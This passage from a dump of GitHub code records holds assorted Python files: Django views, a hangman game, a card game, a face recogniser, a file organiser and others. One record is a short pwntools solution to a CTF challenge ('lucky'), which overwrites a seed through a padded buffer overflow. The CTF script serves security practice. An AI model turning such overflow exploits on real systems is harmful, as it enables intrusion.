'edit_ad.html', context)\n\n\n@login_required()\ndef delete_ad(request, pk):\n ad_to_delete = Ad.objects.get(pk=pk)\n validate_creator(ad_to_delete, request.user)\n clean_up_image_files(ad_to_delete)\n ad_to_delete.delete()\n return redirect('home')\n\n\ndef load_cities(request):\n district_id = request.GET.get('district_id')\n cities = DistrictCity.objects.filter(district_id=district_id)\n return render(request, 'city_dropdown_list_options.html', {'cities': cities})\n\n\ndef load_areas(request):\n city_id = request.GET.get('city_id')\n areas = DistrictCityArea.objects.filter(city_id=city_id)\n return render(request, 'area_dropdown_list_options.html', {'areas': areas})\n\n\nclass AdListApiView(rest_views.APIView):\n def get(self, request):\n books = Ad.objects.all()\n serializer = AdSerializer(books, many=True)\n return Response(serializer.data)\n\n\n","repo_name":"ZYKoleva/SoftUniPythonWebExamProject","sub_path":"estate_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18253434495","text":"import matplotlib.pyplot as plt\nimport unittest\n\nfrom christmas.globe import Perlin\n\n\nclass PerlinTest(unittest.TestCase):\n \"\"\"Visual, qualitative test of snowscape generation.\"\"\"\n def test(self):\n grid = Perlin.generate(20, 20, 50)\n plt.imshow(grid, origin='upper')\n plt.show()\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"thewebers/battle","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"72592514371","text":"from pathlib import Path\nfrom collections import Counter\nimport shutil\nfrom src.data import dir_path\nimport json\nimport sys\nfrom src.data.utiles import read_json\n\n\n\nclass orgnizer:\n\n def __init__(self):\n\n self.ext_json = read_json(\"ext.json\")\n \n self.category = {}\n for folder_cat , sufs in self.ext_json.items():\n for suf in sufs:\n self.category[suf] = folder_cat\n\n\n def cleaner(self, directory_path = \"/home/bahram/Downloads\"):\n ext =[]\n for files in Path(directory_path).iterdir():\n #ignores dirs\n if files.is_dir():\n continue\n\n #ignores hidden files\n if files.name.startswith('.'):\n continue\n\n #moves files\n if files.suffix not in self.category:\n folder_path = Path(directory_path)/'others'\n else:\n folder_path = Path(directory_path)/self.category[files.suffix]\n\n folder_path.mkdir(exist_ok = True)\n shutil.move(str(files) , str(folder_path))\n print(f'{files.suffix:10}{folder_path}')\n ext.append(files.suffix)\n print('done')\n\nif __name__ == \"__main__\":\n c1 = orgnizer()\n c1.cleaner(sys.argv[1])","repo_name":"BahramRoohandeh/Directory_orgnize","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34952502489","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 15 01:11:39 2018\n\n@author: Administrator\n\"\"\"\nimport numpy as np\nimport random\nimport time\n\ndef bucket_sort(V,E):\n\n#V: the list to be sorted\n#E: the size of each bucket\n\n#Prepare for the buckets\n numBucket = len(V)//E+1\n B = []\n for i in range(numBucket):\n B.append([])\n#put each item into the corresponding bucket\n for x in V:\n B[ int(numBucket*x) ].append(x)\n#sort the items in the buckets by turns \n for i in range(len(B)):\n B[i].sort()\n \n j = 0\n for i in range(len(B)):\n for x in B[i]:\n V[j] = x\n j += 1\n return 0\n\n\nif __name__ == '__main__':\n start = time.time()\n V = []\n for i in range(5000000):\n V.append(random.uniform(0,1))\n print(\"Time of generating the numbers\",time.time()-start)\n \n start = time.time()\n# print(V)\n# V.sort()\n bucket_sort(V,5)\n# print(V)\n print(\"Time of sorting\",time.time()-start)\n \n \n ","repo_name":"melodyoh/algorithm_planet","sub_path":"bucket_sort.py","file_name":"bucket_sort.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36045250435","text":"import datetime as dt\nfrom datetime import datetime\nimport subprocess\n\n# Equivalência de datas\n# 0 -> Segunda\n# 1 -> Terça\n#... -> ...\n# 5 -> Sexta\n\nzoomIdsByWeekdayAndHour = {\n\t'0A':'',\n\t'0B':'',\n\t'1A':'',\n\t'1B':'',\n\t'2A':'',\n\t'2B':'',\n\t'3AP':'',\n\t'3AI':'',\n\t'3BP':'98665096620',\n\t'3BI':'',\n\t'4A':'',\n\t'4B':''\n}\n\ntoday = dt.datetime.now()\ntodayWeekday = dt.datetime.today().weekday()\nweekofYear = dt.datetime.now().isocalendar()[1]\ntodayDay = today.day\nhourNow = today.hour\nminuteNow = today.minute\n\n\nif hourNow>=22:\n\tprint('Não há mais aulas para hoje :D')\n\tinput('Pressione qualquer tecla para continuar')\n\texit()\n\nif hourNow <20 or (hourNow == 20 and minuteNow <25):\n\taux = 'A'\nelse:\n\taux = 'B'\n\nif todayWeekday == 3 :\n\tif(weekofYear % 2 == 0):\n\t\taux+='P'\n\telse:\n\t\taux+='I'\n\ntry:\n\tclassId = zoomIdsByWeekdayAndHour[f'{todayWeekday}{aux}']\n\tprint('Abrindo aula...')\n\tsubprocess.call(['%AppData%\\\\Zoom\\\\bin\\\\Zoom.exe', f\"--url=zoommtg://zoom.us/join?action=join^&confno={classId}\"], shell=True)\n\nexcept:\n\tprint('Não há aula cadastrada para o dia de hoje!')\n\tinput('Pressione qualquer tecla para continuar')\n","repo_name":"ItaloPussi/pythonProjects","sub_path":"autoZoom/autoZoom.py","file_name":"autoZoom.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13070840065","text":"#!/usr/bin/env python3\n\nfrom .proc_base import ProcBase\n\n\nclass ProcPartitions(ProcBase):\n '''Object represents the /proc/partitions file.'''\n\n table_header_str = 'Name major/minor ID # KB blocks'\n format_str = '{0:4} {1:>3}.{2:<13} {3:}'\n\n def __init__(self):\n '''\n Read file by calling base class constructor\n then parse the contents.\n '''\n super().__init__('/proc/partitions')\n self.partitions = []\n self.read()\n\n def read(self):\n '''Parses contents of /proc/partitions'''\n for line in self.content.split('\\n')[1:]:\n tokens = line.split()\n if not tokens:\n continue\n\n major = 0\n minor = 0\n blocks = 0\n name = None\n\n if tokens[0] and tokens[0].isdigit():\n major = int(tokens[0])\n\n if tokens[1] and tokens[1].isdigit():\n minor = int(tokens[1])\n\n if tokens[2] and tokens[2].isdigit():\n blocks = int(tokens[2])\n\n if tokens[3]:\n name = tokens[3]\n\n self.partitions.append((major, minor, blocks, name))\n\n def dump(self):\n '''Print information gathered to stdout.'''\n super().dump() # Print file header\n\n print('Major devices with the same number are all '\n 'controlled by the same driver.')\n print('For all SCSI drivers this is 8.\\n')\n print(self.table_header_str)\n print(len(self.table_header_str) * '-')\n\n for (major, minor, blocks, name) in self.partitions:\n print(self.format_str.format(name, major, minor, blocks))\n","repo_name":"EwanC/pyProc","sub_path":"proc_scraper/proc_partitions.py","file_name":"proc_partitions.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18545399064","text":"'''A wrapper for some useful categorical correlation/association metrics.'''\n\nfrom itertools import combinations, permutations\nfrom typing import List, Tuple\n\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats.contingency import association\nfrom dython.nominal import theils_u\n\n\ndef get_categorical_corr(\n data: pd.DataFrame,\n features: List[str] = None,\n method: str = 'cramer',\n thr: float = 0.5\n) -> Tuple[pd.DataFrame, dict]:\n \"\"\"\n Given a dataframe and a list of categorical features, returns a correlation\n matrix, with correlation values for every feature pair. Along with the\n correlation matrix, a dictionary linking each feature that has a\n correlation with any other feature higher\n than `thr` value is also returned.\n\n Parameters\n ----------\n data: pd.DataFrame\n A DataFrame with categorical features of interest.\n features: List[str], optional, default=data.columns\n A list with feature names. If none is provided, will use all the\n columns in `data`.\n method: str, optional, default='cramer'\n The association metric to be used. Available methods:\n - 'cramer' (Cramer's V)\n - 'tschuprow' (Tschuprow's T)\n - 'pearson' (Pearson Contingency Value)\n - 'theil' (Theil's U assymetric association value)\n thr: float, optional, default=0.5\n A threshold value to return the correlated features dictionary.\n\n Returns\n -------\n The correlation matrix itself and the correlated features dictionary,\n as a tuple.\n \"\"\"\n if not isinstance(data, pd.DataFrame):\n raise TypeError(\"'data' should be a pd.DataFrame.\")\n if features is None:\n features = list(data.columns)\n if not isinstance(features, list):\n raise TypeError(\"'features' should be a list with feature names.\")\n if any(not isinstance(feature, str) for feature in features):\n raise TypeError(\"All elements inside 'features' should be strings.\")\n if method not in ['cramer', 'tschuprow', 'pearson', 'theil']:\n raise TypeError(\"Unexpected method provided.\")\n if not isinstance(thr, float):\n raise TypeError(\"'thr' should be a float value.\")\n\n if method != 'theil':\n output = get_symmetrical_metric(data[features], method)\n else:\n output = get_asymmetrical_metric(data[features], method)\n\n # finding features that have any metric greater than 'thr'\n high_corr = [\n x for x in features if any(np.greater(output[x].drop(x, axis=0), thr))\n ]\n corr_features = {}\n features = np.array(features)\n for var in high_corr:\n cond = np.greater(output[f'{var}'], thr)\n not_itself = features != var\n corr_features[f'{var}'] = features[np.where(cond & not_itself)]\n\n return output, corr_features\n\n\ndef get_symmetrical_metric(data: pd.DataFrame, method: str) -> pd.DataFrame:\n \"\"\"\n Given a dataframe and a list of categorical features, returns a correlation\n matrix, with correlation values for every feature pair.\n\n Parameters\n ----------\n data: pd.DataFrame\n A DataFrame with categorical features of interest.\n method: str\n The association metric to be used. Available symmetrical methods:\n - 'cramer' (Cramer's V)\n - 'tschuprow' (Tschuprow's T)\n - 'pearson' (Pearson Contingency Value)\n\n Returns\n -------\n A correlation matrix.\n \"\"\"\n\n # result will be a n_features by n_features symmetric matrix\n # so we initialize it as an identity matrix\n output = pd.DataFrame(\n np.eye(len(data.columns)),\n columns=data.columns,\n index=data.columns\n )\n\n # because these metrics are symmetric, we only need half\n # of the pair-wise combinations\n combs = combinations(data.columns, r=2)\n # for every pair, we calculate its contingency based association.\n for comb in combs:\n feat_a = comb[0]\n feat_b = comb[1]\n\n # use crosstab to find the contingency table between features\n input_tab = pd.crosstab(data[feat_a], data[feat_b])\n res = association(input_tab, method=method, correction=True)\n\n output[feat_a][feat_b], output[feat_b][feat_a] = res, res\n\n return output\n\n\ndef get_asymmetrical_metric(data: pd.DataFrame, method: str) -> pd.DataFrame:\n \"\"\"\n Given a dataframe and a list of categorical features, returns a correlation\n matrix, with correlation values for every feature pair.\n\n Parameters\n ----------\n data: pd.DataFrame\n A DataFrame with categorical features of interest.\n method: str\n The association metric to be used. Available asymmetrical methods:\n - Theil's U\n\n Returns\n -------\n A correlation matrix.\n \"\"\"\n # result will be a n_features by n_features symmetric matrix\n # so we initialize it as an identity matrix\n output = pd.DataFrame(\n np.eye(len(data.columns)),\n columns=data.columns,\n index=data.columns\n )\n\n # because these metrics are asymmetric, we need all\n # of the pair-wise combinations\n combs = permutations(data.columns, r=2)\n # for every pair, calculate theil U.\n for comb in combs:\n feat_a = comb[0]\n feat_b = comb[1]\n\n output[feat_a][feat_b] = theils_u(\n data[feat_a],\n data[feat_b]\n )\n\n return output\n","repo_name":"eduardokapp/categorical_correlation","sub_path":"cat_corr/cat_corr.py","file_name":"cat_corr.py","file_ext":"py","file_size_in_byte":5483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"16353323324","text":"from faceTrain import train\nimport os\nimport numpy as np\nimport cv2 as cv\n\nDIR = r'C:\\Users\\JoseAtlin\\Desktop\\local_repo\\openCV\\validate'\npeople = [p for p in os.listdir(DIR)]\n\nfeatures = np.load('features.npy', allow_pickle=True)\nlabels = np.load('labels.npy', allow_pickle=True)\n\nfaceRecognizer = cv.face.LBPHFaceRecognizer_create()\nfaceRecognizer.read('faceTrained.yml')\n\nimage = cv.imread(r'C:\\Users\\JoseAtlin\\Desktop\\local_repo\\openCV\\validate\\Neymar jr\\Neymar.jpg')\ngray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n\nhaarCascade = cv.CascadeClassifier('haarFace.xml')\nfaceDetect = haarCascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=3)\nfor (x, y, w, h) in faceDetect:\n faceROI = gray[y:y + h, x:x + w]\n\n label, confidence = faceRecognizer.predict(faceROI)\n print(f'Label = {people[label]} with confidence of {confidence}')\n\n cv.putText(image, str(people[label]), (20, 20), cv.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255), thickness=1)\n cv.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), thickness=1)\n\ncv.imshow('detected Face', image)\ncv.waitKey(0)","repo_name":"JoseAtlin/computerVision","sub_path":"faceDetection.py","file_name":"faceDetection.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"31484597535","text":"\"\"\"\nBase tools for defining field types.\n\"\"\"\n\n__all__ = [\n \"FieldType\",\n \"Axes\",\n]\n\nimport re\nfrom types import MappingProxyType\nfrom collections import OrderedDict\n\n\nclass FieldType(type):\n \"\"\"\n Metaclass for the field types.\n Field types are special classes used to define properties of fields\n depending on the axes.\n\n Field types have the following restrictions\n - The name of the class must be **unique**. All the field\n types are stored in dictionary (FieldType.s) and this list is\n looked up for searching properties of the field.\n - The FieldType needs to define an attribute __axes__ to specify\n which axes are needed for the properties of the type.\n\n\n Behaviour of field type special attributes:\n __axes__: list of axes that identify the field type.\n One can use generic names as \"dims\", \"dofs\" or properties\n like \"space\" or any of the special dimensions that may\n be defined on the lattice. If the current lattice does not\n have dimensions with these names, the field type will be simply\n ignored.\n Special characters may follow the name of the dimension as\n \"+\", \"!\"...\n The \"+\" means that the dimension can appear more than once.\n If a dimension is not followed by any special character then\n the \"+\" behavious is applied; e.g. \"dims\" -> \"dims+\".\n The \"!\" means that the specific dimension can be repeated only\n once. E.g. \"spin!\" means that only one spin dimension must be\n present to be of this type. Repetition of the dimension with\n \"!\" increase the counter, e.g. [\"spin!\", \"spin!\"] = \"spin!!\"\n means that the spin dimension must appear twice to be of the type.\n When \"!\" is used for a group of dimensions, i.e. \"dofs!\" then\n means that all the dofs must appear and only once. Then\n [\"dofs!\", \"dofs\"] = \"dofs!+\" means that all the dofs must appear\n but repetitions are allowed.\n\n - __init__ =\n \"\"\"\n\n __types__ = OrderedDict()\n s = MappingProxyType(__types__)\n BaseField = None\n Field = None\n\n @classmethod\n def __prepare__(cls, name, bases, **kwargs):\n \"\"\"\n Checks that the name of the class is unique and construct from\n the axes in the base classes (bases) the axes for the new class.\n \"\"\"\n assert not kwargs, \"kwargs not used\"\n assert name not in cls.__types__, \"A FieldType named %s already exists\" % name\n\n axes = Axes()\n for base in bases:\n if isinstance(base, FieldType):\n axes += base.axes\n\n return {\"__axes__\": axes}\n\n def __new__(cls, name, bases, attrs, **kwargs):\n \"Checks that __axes__ is a valid Axes\"\n assert not kwargs, \"kwargs not used\"\n\n assert \"__axes__\" in attrs\n attrs[\"__axes__\"] = Axes(attrs[\"__axes__\"])\n return super().__new__(cls, name, bases, attrs)\n\n def __init__(cls, name, bases, attrs, **kwargs):\n \"\"\"\n Adds the class to the list of all FieldType and checks\n that is subclass of bases.\n \"\"\"\n assert not kwargs, \"kwargs not used\"\n\n for base in bases:\n assert issubclass(\n cls, base\n ), \"\"\"\n The axes defined in the class %s are not compatible\n with the parent class %s.\n Axes of %s: %s\n Axes of %s: %s\n \"\"\" % (\n cls,\n base,\n cls,\n cls.axes,\n base,\n base.axes,\n )\n\n FieldType.__types__[name] = cls\n FieldType.__types__.move_to_end(name, last=False)\n super().__init__(name, bases, attrs)\n\n def __call__(cls, *args, **kwargs):\n \"Returns a Field with the correct axes\"\n return cls.Field(*args, axes=kwargs.pop(\"axes\", cls.axes.expand), **kwargs)\n\n def __subclasscheck__(cls, child):\n \"Checks if child is subclass of class\"\n return isinstance(child, FieldType) and cls.axes in child.axes\n\n def __instancecheck__(cls, field):\n \"Checks if field is compatible with the class\"\n if not isinstance(field, cls.BaseField):\n return False\n if cls.axes.labels not in field.lattice:\n return False\n axes = list(field.axes)\n for axis in field.lattice.expand(cls.axes.must):\n if axis not in axes:\n return False\n axes.remove(axis)\n axes = set(axes)\n for axis in cls.axes.may:\n if not axes.intersection(field.lattice.expand(axis)):\n return False\n return True\n\n @property\n def axes(cls):\n return cls.__axes__\n\n\nclass Axes(tuple):\n \"\"\"\n Functionalities to parse the axes.\n \"\"\"\n\n _get_label = re.compile(r\"[a-zA-Z]([a-zA-Z0-9]|_[0-9]*[a-zA-Z])*\")\n\n @classmethod\n def get_label(cls, key):\n return cls._get_label.match(key)[0]\n\n _get_count = re.compile(\n # r\"([\\+\\!\\?\\*]|({([0-9]+,?)+(,...)?}))?$\"\n r\"[\\!]*[\\+]?$\"\n )\n\n @classmethod\n def get_count(cls, key):\n return cls._get_count.search(key)[0]\n\n _check_key = re.compile(_get_label.pattern + _get_count.pattern)\n\n @classmethod\n def check_keys(cls, keys):\n for key in keys:\n if not cls._check_key.match(key):\n raise KeyError(\"Invalid key: %s.\" % key)\n\n def __new__(cls, axes=()):\n if isinstance(axes, cls):\n return axes\n\n if isinstance(axes, str):\n axes = (axes,)\n\n cls.check_keys(axes)\n\n tmp = dict()\n for axis in axes:\n clean = cls.get_label(axis)\n sym = \"!\" * axis.count(\"!\") + tmp.get(clean, \"\")\n if axis == clean or axis[-1] == \"+\":\n if sym.endswith(\"+\"):\n sym = sym[:-1] + \"!\"\n sym += \"+\"\n tmp[clean] = sym\n\n axes = tuple((key + val for key, val in tmp.items()))\n\n return super().__new__(Axes, axes)\n\n def __add__(self, axes):\n return Axes(super().__add__(Axes(axes)))\n\n def __contains__(self, axes):\n axes = Axes(axes)\n axes = dict(zip(axes.labels, axes.counts))\n this = dict(zip(self.labels, self.counts))\n return all((axis in this for axis in axes)) and all(\n (\n len(count) <= len(this[axis])\n if count[-1] == \"+\"\n else count == this[axis]\n for axis, count in axes.items()\n )\n )\n\n @property\n def expand(self):\n axes = []\n for axis, count in zip(self.labels, self.counts):\n axes += [axis] * len(count)\n return tuple(axes)\n\n @property\n def must(self):\n axes = []\n for axis, count in zip(self.labels, self.counts):\n axes += [axis] * count.count(\"!\")\n return tuple(axes)\n\n @property\n def may(self):\n axes = []\n for axis, count in zip(self.labels, self.counts):\n axes += [axis] * count.count(\"+\")\n return tuple(axes)\n\n @property\n def labels(self):\n return tuple((self.get_label(axis) for axis in self))\n\n @property\n def counts(self):\n return tuple((self.get_count(axis) for axis in self))\n","repo_name":"Lyncs-API/lyncs","sub_path":"lyncs/field/types/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7284,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"43"} +{"seq_id":"1393259632","text":"from random import choice\n\nfrom player import Player, Human\nfrom apuesta import Apuesta\nimport logic\n\n\nclass MusGame:\n goal: int\n player1: Player\n player2: Player\n marcador: list[int, int]\n round: int\n\n def __init__(self, goal: int, p1: Player, p2: Player):\n self.goal = goal\n self.player1 = p1\n self.player2 = p2\n self.marcador = [0, 0]\n self.round = 0\n\n def is_finished(self) -> bool:\n return self.marcador[0] >= self.goal or self.marcador[1] >= self.goal\n\n def play(self):\n if isinstance(self.player1, Human) or isinstance(self.player2, Human):\n self.__run_game(imprimir=True)\n else:\n self.__run_game(imprimir=False)\n self.player1.imprimir = False\n self.player2.imprimir = False\n self.player1.goal = self.goal\n self.player2.goal = self.goal\n self.player1.marcador = self.marcador\n self.player2.marcador = self.marcador\n\n def __print_cartas(self):\n print(f\"cartas de {self.player1}: {self.player1.cartas}\")\n print(f\"cartas de {self.player2}: {self.player2.cartas}\")\n\n def __run_game(self, imprimir: bool):\n\n # Consideramos siempre al jugador 1 como humano\n if not isinstance(self.player1, Human):\n self.player1, self.player2 = self.player2, self.player1\n\n self.player2.goal = self.goal\n self.player2.marcador = self.marcador\n\n self.player1.preguntar_nombre()\n\n x = choice([0, 1])\n\n if imprimir:\n print(f\"{self.player1} VS {self.player2}\")\n print(\"Suerte!\")\n else:\n self.player1.imprimir = False\n self.player2.imprimir = False\n\n while not self.is_finished():\n\n if self.round % 2 == x:\n self.player1.mano = True\n self.player2.mano = False\n mano = 1\n if imprimir:\n print(f\"El mano es {self.player1}\")\n else:\n self.player1.mano = False\n self.player2.mano = True\n mano = 2\n if imprimir:\n print(f\"El mano es {self.player2}\")\n\n self.player1.cartas, self.player2.cartas = logic.repartir(2)\n if imprimir:\n print(\"Tus cartas son: \" + str(self.player1.cartas))\n\n # A grande:\n apuesta_grande = self._apostar(lance=1)\n if apuesta_grande.ganador == 1:\n self.marcador[0] += apuesta_grande.apuesta_previa\n if imprimir:\n print(f\"La puntuación de {self.player1} ha subido a: {self.marcador[0]}\")\n elif apuesta_grande.ganador == 2:\n self.marcador[1] += apuesta_grande.apuesta_previa\n if imprimir:\n print(f\"La puntuación de {self.player2} ha subido a: {self.marcador[1]}\")\n elif apuesta_grande.ordago:\n ganador = logic.gana_grande(self.player1.cartas, self.player2.cartas, mano)\n self.__print_cartas()\n if ganador == 1:\n self.marcador[0] = self.goal\n if imprimir:\n print(f\"La puntuación de {self.player1} ha subido a: {self.goal}\")\n else:\n self.marcador[1] = self.goal\n if imprimir:\n print(f\"La puntuación de {self.player2} ha subido a: {self.goal}\")\n break\n\n if self.is_finished():\n break\n\n # A chica:\n apuesta_chica = self._apostar(lance=2)\n if apuesta_chica.ganador == 1:\n self.marcador[0] += apuesta_chica.apuesta_previa\n if imprimir:\n print(f\"La puntuación de {self.player1} ha subido a: {self.marcador[0]}\")\n elif apuesta_chica.ganador == 2:\n self.marcador[1] += apuesta_chica.apuesta_previa\n if imprimir:\n print(f\"La puntuación de {self.player2} ha subido a: {self.marcador[1]}\")\n elif apuesta_chica.ordago:\n ganador = logic.gana_chica(self.player1.cartas, self.player2.cartas, mano)\n self.__print_cartas()\n if ganador == 1:\n self.marcador[0] = self.goal\n if imprimir:\n print(f\"La puntuación de {self.player1} ha subido a: {self.goal}\")\n else:\n self.marcador[1] = self.goal\n if imprimir:\n print(f\"La puntuación de {self.player2} ha subido a: {self.goal}\")\n break\n\n if self.is_finished():\n break\n\n # Conteo de tantos pendientes:\n # A grande:\n if apuesta_grande.ganador is None:\n ganador = logic.gana_grande(self.player1.cartas, self.player2.cartas, mano)\n if ganador == 1:\n self.marcador[0] += apuesta_grande.apuesta_total\n if imprimir:\n print(f\"La puntuación de {self.player1} ha subido a: {self.marcador[0]}\")\n elif ganador == 2:\n self.marcador[1] += apuesta_grande.apuesta_total\n if imprimir:\n print(f\"La puntuación de {self.player2} ha subido a: {self.marcador[1]}\")\n\n if self.is_finished():\n break\n\n if apuesta_chica.ganador is None:\n ganador = logic.gana_chica(self.player1.cartas, self.player2.cartas, mano)\n if ganador == 1:\n self.marcador[0] += apuesta_chica.apuesta_total\n if imprimir:\n print(f\"La puntuación de {self.player1} ha subido a: {self.marcador[0]}\")\n elif ganador == 2:\n self.marcador[1] += apuesta_chica.apuesta_total\n if imprimir:\n print(f\"La puntuación de {self.player2} ha subido a: {self.marcador[1]}\")\n\n if self.is_finished():\n if imprimir:\n self.__print_cartas()\n break\n\n if imprimir:\n print(f\"cartas de {self.player1}: {self.player1.cartas}\")\n print(f\"cartas de {self.player2}: {self.player2.cartas}\")\n print(f\"puntuación de {self.player1}: {self.marcador[0]}\")\n print(f\"puntuación de {self.player2}: {self.marcador[1]}\")\n print(\"\")\n\n self.round += 1\n\n if self.marcador[0] >= self.goal:\n print(f\"¡Ha ganado {self.player1}!\")\n else:\n print(f\"¡Ha ganado {self.player2}!\")\n\n def _apostar(self, lance: int, imprimir: bool = True) -> Apuesta:\n \"\"\"\n :lance: 1=grande, 2=chica, 3=pares, 4=juego (por ahora solo se puede jugar a grande y a chica)\n\n Es la función principal de las apuestas.\n Existen 3 posibles acciones: pasar, apostar, ordaguear. Se puede considerar el siguiente arbol de decisión:\n Opción 1, Pasar:\n pasar --> se acaba el bucle\n apuesta n --> continua el bucle... (Opción 3)\n órdago --> ordago() (Opción 2)\n Opción 2, Órdago:\n ordago()\n Opción 3, apuesta n:\n ver --> se acaba el bucle. (Queda pendiente)\n pasar --> se acaba el bucle. (El ganador se lleva la apuesta n previa o en su defecto 1)\n órdago --> ordago()\n apuesta n --> Se repite el bucle.\n \"\"\"\n if imprimir:\n if lance == 1:\n print(\"A GRANDE: \")\n elif lance == 2:\n print(\"A CHICA:\")\n elif lance == 3:\n print(\"A PARES:\")\n else:\n print(\"A JUEGO:\")\n\n apuesta = Apuesta()\n\n while not apuesta.acuerdo:\n if self.player1.mano:\n apuesta = self.player1.pedir_apuesta(apuesta, 1, lance)\n\n if apuesta.acuerdo and apuesta.n_acciones > 1:\n break\n\n apuesta = self.player2.pedir_apuesta(apuesta, 2, lance)\n else:\n apuesta = self.player2.pedir_apuesta(apuesta, 2, lance)\n\n if apuesta.acuerdo and apuesta.n_acciones > 1:\n break\n\n apuesta = self.player1.pedir_apuesta(apuesta, 1, lance)\n\n return apuesta\n","repo_name":"Pabloo22/Reinforcement-Learning","sub_path":"Monte Carlo Methods/mus (card game)/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":8524,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36470638963","text":"from pwn import *\nimport time\n\nbinary = args.BIN\n\ncontext.terminal = [\"tmux\", \"splitw\", \"-h\"]\ne = context.binary = ELF(binary)\nr = ROP(e)\n\ngs = '''\ncontinue\n'''\n\ndef start():\n if args.GDB:\n return gdb.debug(e.path, gdbscript=gs)\n elif args.REMOTE:\n return remote(\"tamuctf.com\", 443, ssl=True, sni=\"lucky\")\n else:\n return process(e.path)\n\np = start()\n\npad = b'A'*12\nseed = p64(5649426)\n\np.sendline(pad+seed)\np.interactive()\n\n\n\n","repo_name":"tj-oconnor/ctf-writeups","sub_path":"tamu_ctf/lucky/pwn-lucky.py","file_name":"pwn-lucky.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"43"} +{"seq_id":"71433441090","text":"#WikiScrape\n\nimport csv\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nhtml = urlopen(\"https://en.wikipedia.org/wiki/Deep_learning\")\n\nsoup = BeautifulSoup(html, features=\"lxml\")\n\n#Title\ntitle = soup.find(id=\"firstHeading\")\n\n#Body\nmain_body = soup.findAll('p')\nmain_body = soup.p.prettify()\n\n\n\n#print(main_body)\n\ncsvfile = open('wiki.csv', 'a')\nwriter = csv.writer(csvfile)\ndata_0 = (title)\ndata_1 = (main_body)\nwriter.writerow(data_0)\nwriter.writerow(data_1)\n\n#body\n #content\n #div id = mw-content-text\n #div class = mw-content-text\n #

    \n \n\n\n\n\n\n\n","repo_name":"Bhaney44/Scrapers","sub_path":"Stack_1d.py","file_name":"Stack_1d.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24206864401","text":"import random\r\n\r\ndef jogar():\r\n print(\"JOGO DA FORCA\")\r\n\r\n palavra_secreta=carrega_palavra_secreta()\r\n letras_acertadas = inicializa_letras_acertadas(palavra_secreta)\r\n\r\n enforcou = False\r\n acertou=False\r\n tentativas=0\r\n \r\n print(letras_acertadas)\r\n \r\n while(not acertou and not enforcou):\r\n chute = pede_chute()\r\n if (chute in palavra_secreta):\r\n marca_chute_correto(chute, letras_acertadas, palavra_secreta)\r\n else:\r\n tentativas=tentativas+1\r\n print(letras_acertadas)\r\n enforcou = tentativas == 10\r\n acertou = \"_\" not in letras_acertadas\r\n\r\n if (acertou):\r\n print(\"Você ganhou! Parabéns!\")\r\n else:\r\n print(\"Você perdeu.\")\r\n print(\"A palavra era {}\".format(palavra_secreta))\r\n\r\ndef carrega_palavra_secreta():\r\n arquivo = open(\"palavras.txt\", \"r\")\r\n palavras = []\r\n for linha in arquivo:\r\n linha = linha.strip()\r\n palavras.append(linha)\r\n arquivo.close()\r\n numero = random.randrange(0, len(palavras))\r\n palavra_secreta = palavras[numero].lower()\r\n return palavra_secreta\r\n\r\ndef inicializa_letras_acertadas(palavra):\r\n return [\"_\" for letra in palavra]\r\n\r\ndef pede_chute():\r\n chute = input(\"Qual letra? \")\r\n chute = chute.strip()\r\n chute=chute.lower()\r\n return chute\r\n\r\ndef marca_chute_correto(chute, letras_acertadas, palavra_secreta):\r\n posicao = 0\r\n for letra in palavra_secreta:\r\n if (chute == letra):\r\n letras_acertadas[posicao] = letra\r\n posicao += 1\r\n\r\nif (__name__ == \"__main__\"):\r\n jogar()\r\n\r\n","repo_name":"ruhangon/cursos-online-python","sub_path":"parte 2/jogos/forca.py","file_name":"forca.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11807511242","text":"class Solution(object):\n def twoSum(self, nums, target):\n # declaration of the dictionary\n seen = {}\n for i in range(0, len(nums)):\n value = nums[i]\n remaining = target - value\n # we find the remaining element in the dictionary\n if remaining in seen:\n return [i, seen[remaining]]\n # we add nums[i] as the key and its index as the value in the dictionary\n seen[value]=i\n","repo_name":"bdub-dev/Coding-Problems","sub_path":"1-two-sum/1-two-sum.py","file_name":"1-two-sum.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36179338947","text":"from django.contrib import admin\n\nfrom src.core.utils import 